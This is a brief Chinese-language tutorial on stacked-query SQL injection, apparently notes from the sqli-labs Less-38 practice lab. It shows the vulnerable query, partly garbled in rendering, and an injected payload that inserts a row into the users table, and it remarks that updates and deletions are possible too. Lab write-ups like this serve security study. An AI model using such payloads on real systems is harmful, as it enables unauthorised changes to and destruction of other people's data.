SQL注入之堆叠注入
堆叠注入:就是一堆sql语句(多条)进行执行。在mysql中,每句语句结尾加;表示语句结束,这样我们就想到了是不是可以多句一起使用,也就是堆叠。(并非支持全部数据库)(一般就是mysql)
- 先在数据库运行,一次性进行两句sql语句
靶场:sqli-labs/Less-38/
后台sql语句 - s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = ′ sql="SELECT * FROM users WHERE id=' sql="SELECT∗FROMusersWHEREid=′id’ LIMIT 0,1";
我们构建payload为
- ?id=1’;insert into users(id,username,password) values(21,‘5555’,‘5555’); #
从而实现在数据库新增数据。
当然他的作用还不止于此,我们还需要发掘,比如更新,删除;